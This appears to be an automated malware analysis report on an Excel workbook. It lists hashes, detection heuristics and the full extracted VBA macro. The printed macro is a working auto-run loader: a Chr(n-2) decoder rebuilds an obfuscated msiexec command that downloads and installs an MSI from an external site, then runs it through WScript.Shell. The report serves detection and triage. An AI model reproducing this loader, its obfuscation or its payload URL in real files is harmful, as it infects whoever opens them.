Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b58db52777b6fef0…

MALICIOUS

Office (OOXML)

14.1 KB Created: 2020-05-18 23:05:55 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-09-07
MD5: d3ba5c2331e953d8184d30dfa4f3c493 SHA-1: c70ebd7e14b0ec8053564046045e68387e52a38a SHA-256: b58db52777b6fef07e26aa8258b9b50d22bc594eece4793c85ae98501a8a5d74
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing a Workbook_Open macro that executes obfuscated VBA code. This code utilizes WScript.Shell and the Shell() function, indicating an attempt to run arbitrary commands. The presence of these critical heuristics strongly suggests the document is designed to download and execute a secondary payload.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
Set Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2 = CreateObject(WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE)
fDb_9y1J5N_BxHwJ_33_Q8fZxjCq2SVaKjrPG6kBJkT1gSlHyiEnmVuhhB5YuKRl1jzObgCwS1xqno2f84ySMtwxvHsEAJO9Rs_6bUrSfQ = Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2.Run(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S, OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub workbook_open()
ylouQK_W1_XI_S7vl2QT8n.nXiuHO6os6Kxqabh__zEV

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3291 bytes
SHA-256: 2325252393fdfb8c9c6c1492f340fcdb76d338e43910fd1c88d99e0162d06d37
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
ylouQK_W1_XI_S7vl2QT8n.nXiuHO6os6Kxqabh__zEV

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ylouQK_W1_XI_S7vl2QT8n"
Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
Set Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2 = CreateObject(WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE)
fDb_9y1J5N_BxHwJ_33_Q8fZxjCq2SVaKjrPG6kBJkT1gSlHyiEnmVuhhB5YuKRl1jzObgCwS1xqno2f84ySMtwxvHsEAJO9Rs_6bUrSfQ = Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2.Run(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S, OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA)
End Function
Sub nXiuHO6os6Kxqabh__zEV()

vV_AcneGNt_oxAWM2LvlCCv__ = m_n1(69) & m_n1(79) & m_n1(102) & m_n1(34) & m_n1(49) & m_n1(69) & m_n1(34) & m_n1(111) & m_n1(117) & m_n1(96) & m_n1(107) & m_n1(71) & m_n1(96) & m_n1(122) & m_n1(96) & m_n1(103) & m_n1(101)
vV_AcneGNt_oxAWM2LvlCCv__ = vV_AcneGNt_oxAWM2LvlCCv__ & m_n1(34) & m_n1(49) & m_n1(107) & m_n1(34) & m_n1(106) & m_n1(118) & m_n1(118) & m_n1(114) & m_n1(60) & m_n1(49) & m_n1(49) & m_n1(105) & m_n1(113) & m_n1(118) & m_n1(119) & m_n1(116) & m_n1(107) & m_n1(124) & m_n1(111) & m_n1(48) & m_n1(101) & m_n1(113) & m_n1(111) & m_n1(49) & m_n1(121) & m_n1(114) & m_n1(47) & m_n1(101) & m_n1(113) & m_n1(112) & m_n1(118) & m_n1(103) & m_n1(112) & m_n1(118) & m_n1(49) & _
 m_n1(118) & m_n1(106) & m_n1(103) & m_n1(111) & m_n1(103) & m_n1(117) & m_n1(49) & m_n1(100) & m_n1(119) & m_n1(117) & m_n1(107) & m_n1(104) & m_n1(123) & m_n1(49) & m_n1(118) & m_n1(103) & m_n1(111) & m_n1(114) & m_n1(49) & m_n1(56) & m_n1(50) & m_n1(52) & m_n1(51) & m_n1(57) & m_n1(57) & m_n1(53) & m_n1(48) & m_n1(111) & m_n1(117) & m_n1(107) & m_n1(34) & m_n1(49) & m_n1(115) & m_n1(112) & _
 m_n1(34)
On Error Resume Next
v_4ZDM7_32sy8y5UATUbEE9QfJ_47u82MfSUdlGpx_WqsTTpmCSl_x_qEm42cBvF4xmbfj1ZKpn_tRiJz_R3cVGXfmOzqNLuROu3r2HBK2YDJ_7vCtBW = vV_AcneGNt_oxAWM2LvlCCv__
YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD (v_4ZDM7_32sy8y5UATUbEE9QfJ_47u82MfSUdlGpx_WqsTTpmCSl_x_qEm42cBvF4xmbfj1ZKpn_tRiJz_R3cVGXfmOzqNLuROu3r2HBK2YDJ_7vCtBW)
End Sub
Function m_n1(nm As Integer)
m_n1 = Chr(nm - 2)
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 17920 bytes
SHA-256: 7c78e1d0f5a2047d62ec982bdc40f5a559fbc6c5f71907b47237f9ca8d661775

Open this report in the interactive analyzer, or submit your own file for analysis.